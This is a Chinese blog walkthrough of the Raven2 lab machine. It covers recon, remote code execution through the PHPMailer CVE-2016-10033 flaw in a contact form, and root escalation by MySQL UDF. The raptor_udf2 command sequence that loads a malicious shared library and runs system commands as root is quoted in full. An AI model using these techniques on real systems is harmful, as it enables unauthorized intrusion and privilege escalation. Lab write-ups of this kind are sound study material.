raven2靶机渗透

前言

这个靶机说实在话有点误导人,这个后面再说。但确实是一个好靶机,学到不少东西。

知识点

  • cve-2016-10033
  • linux平台udf提权

详细过程

信息搜集

  1. 例行信息搜集

    • 端口扫描

    • 目录扫描

    发现vendorwordpress目录(实际在测试过程中发现需要修改hosts文件raven.local,解析到本地搭建ip)

  2. vendor目录

    这里其实泄露(提示)了很多信息

    • PATH文件 ===> /var/www/html/vendor/
    • Readme.md文件 ==> 提示为phpmailer(第一次知道没啥感觉)
    • VERSION ===> 5.2.16看着像版本号
    • Security.md就有意思了,内容如下
    # Security notices relating to PHPMailer
    
    Please disclose any vulnerabilities found responsibly - report any security problems found to the maintainers privately.
    
    PHPMailer versions prior to 5.2.18 (released December 2016) are vulnerable to [CVE-2016-10033](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10033) a remote code execution vulnerability, responsibly reported by [Dawid Golunski](https://legalhackers.com).
    
    PHPMailer versions prior to 5.2.14 (released November 2015) are vulnerable to [CVE-2015-8476](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8476) an SMTP CRLF injection bug permitting arbitrary message sending.
    
    PHPMailer versions prior to 5.2.10 (released May 2015) are vulnerable to [CVE-2008-5619](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5619), a remote code execution vulnerability in the bundled html2text library. This file was removed in 5.2.10, so if you are using a version prior to that and make use of the html2text function, it's vitally important that you upgrade and remove this file.
    
    PHPMailer versions prior to 2.0.7 and 2.2.1 are vulnerable to [CVE-2012-0796](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0796), an email header injection attack.
    
    Joomla 1.6.0 uses PHPMailer in an unsafe way, allowing it to reveal local file paths, reported in [CVE-2011-3747](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3747).
    
    PHPMailer didn't sanitise the `$lang_path` parameter in `SetLanguage`. This wasn't a problem in itself, but some apps (PHPClassifieds, ATutor) also failed to sanitise user-provided parameters passed to it, permitting semi-arbitrary local file inclusion, reported in [CVE-2010-4914](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4914), [CVE-2007-2021](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2021) and [CVE-2006-5734](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5734).
    
    PHPMailer 1.7.2 and earlier contained a possible DDoS vulnerability reported in [CVE-2005-1807](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1807).
    
    PHPMailer 1.7 and earlier (June 2003) have a possible vulnerability in the `SendmailSend` method where shell commands may not be sanitised. Reported in [CVE-2007-3215](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3215).
    

    直接提示phpmailer历史版本漏洞,这里已经告诉我们phpmailer版本为5.2.16,所以存在cve-2016-10033

  3. wordpress目录

    这里为wordpress的根目录。具体的信息搜集我就不展示了,无非使用wpscan,看一下版本

    4.8.12,最近发布(唉早点看到就好了)为什么我要强调版本,是因为结合之前的信息搜集知道phpmailer存在cve-2016-10033,之后我在网上百度wordpress+phpmailerwprdpress找回密码的页面可基于cve-2016-10033漏洞getshell。后来找了好多exp,试了好久都没成功。后来才发现靶机wordpress版本为4.8,漏洞应该已经修复。卒。看来后面还要更加细心,才能少走弯路。

getshell

  1. getshell

    确实存在cve漏洞,但真正能getshell的页面在contact.php。可以截包看到我们填写的信息被post到contact.php页面。

    其实能够扫描到根目录存放着contact.zip。看一下源码。就是将我们的输入通过phpmailer发送到管理员邮箱。

    if (isset($_REQUEST['action'])){
    	$name=$_REQUEST['name'];
    	$email=$_REQUEST['email'];
    	$message=$_REQUEST['message'];
    	if (($name=="")||($email=="")||($message=="")){
    		echo "There are missing fields.";
    	}else{		
    		require 'vendor/PHPMailerAutoload.php';
    		$mail = new PHPMailer;
    		$mail->Host = "localhost";
    		$mail->setFrom($email, 'Vulnerable Server');
    		$mail->addAddress('admin@vulnerable.com', 'Hacker');
    		$mail->Subject  = "Message from $name";
    		$mail->Body     = $message;
    		if(!$mail->send()) {
    			echo 'Message was not sent.';
    			echo 'Mailer error: ' . $mail->ErrorInfo;
    		} else {
    			echo 'Message has been sent.';
    		}
    	}
    }  
    ?>
    

    搜索一下exp

    需要修改脚本的target和backdoor

    执行后,监听设定端口和访问我们的后门文件,拿到shell

  2. 需要多说一句的是cve-2016-10033的原理,其实并不难。主要是phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名,但过滤不严,导致可绕过正则,执行sendmail的命令行参数造成可写文件,产生webshell。具体更加详细的原理可参考。

    • https://blog.csdn.net/zhangpen130/article/details/103933875
    • http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033
    • https://paper.seebug.org/161/

提权

  1. 拿到shell后要查看的是wordpress的站点信息,因为getshell没用到wordpress。我们在wordpress配置文件找到mysql数据库密码和用户

    登陆mysql数据库也没啥有用的。执行提权辅助脚本

    看到mysql以root权限启动,尝试udf提权。

  2. 搜索exp

    这个比较新一点。用法其实在里面给定很详细了。

     Usage:
     $ id
     uid=500(raptor) gid=500(raptor) groups=500(raptor)
     $ gcc -g -c raptor_udf2.c
     $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
     $ mysql -u root -p
     Enter password:
     [...]
     mysql> use mysql;
     mysql> create table foo(line blob);
     mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
     mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
     mysql> create function do_system returns integer soname 'raptor_udf2.so';
     mysql> select * from mysql.func;
     +-----------+-----+----------------+----------+
     | name      | ret | dl             | type     |za
     +-----------+-----+----------------+----------+
     | do_system |   2 | raptor_udf2.so | function |
     +-----------+-----+----------------+----------+
     mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
     mysql> \! sh
     sh-2.05b$ cat /tmp/out
     uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
     [...]
    

    执行过程中可能会报错,比如我,解决方法

  3. 此时可执行root命令,可使用一些suid提权,如find,vi

    vi提权1

    vi提权2

    find提权1

    find提权2

  4. 最后

  5. 一点总结

    细心能少走很多弯路。有时候急于达到目的反而浪费时间,不如享受过程。还是那句话,快就是慢,慢就是快

参考

https://www.cnblogs.com/micr067/p/11405274.html

https://blog.csdn.net/zhangpen130/article/details/103933875

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033

https://paper.seebug.org/161/

发布了26 篇原创文章 · 获赞 4 · 访问量 2306
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 大白 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览